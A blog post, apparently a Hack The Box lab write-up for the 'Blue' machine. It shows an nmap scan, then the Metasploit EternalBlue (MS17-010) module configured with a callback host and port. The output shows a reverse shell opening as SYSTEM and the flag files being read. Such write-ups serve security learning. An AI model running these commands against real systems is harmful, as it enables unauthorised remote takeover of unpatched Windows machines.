Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the all-in-one-seo-pack domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/blog/wp-includes/functions.php on line 6114

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wpforms-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /var/www/blog/wp-includes/functions.php on line 6114
HTB: Blue - The Hacking Blog

26 August 2019 by Jack

HTB: Blue

Details

This machine is Blue from Hack The Box

Recon

I started with an nmap scan

root@kali:~# nmap -sV -p- -T4 10.10.10.40
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-07 14:42 EDT
Nmap scan report for 10.10.10.40
Host is up (0.041s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds

Blue

Well the machine is called Blue, and smb is open, so eternal blue seems like a good start

root@kali:~# msfconsole

msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.34
LHOST => 10.10.14.34

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.35:4444
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! -
[SNIP]
[*] Command shell session 1 opened (10.10.14.35:4444 -> 10.10.10.40:49158) at 2019-07-07 14:47:44 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
C:\Windows\system32>

And there is a shell

C:\Windows\system32>whoami
nt authority\system

Now for my flags

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is A0EF-1911

 Directory of C:\Users

21/07/2017  07:56    <DIR>          .
21/07/2017  07:56    <DIR>          ..
21/07/2017  07:56    <DIR>          Administrator
14/07/2017  14:45    <DIR>          haris
12/04/2011  08:51    <DIR>          Public
               0 File(s)              0 bytes
               5 Dir(s)  15,753,904,128 bytes free

C:\Users>cd haris/desktop

C:\Users\haris\Desktop>type user.txt
[REDACTED]

C:\Users\haris\Desktop>cd ../../Administrator/Desktop

C:\Users\Administrator\Desktop>type root.txt
[REDACTED]

Published by Jack

View all posts by Jack

Leave a Reply Cancel reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.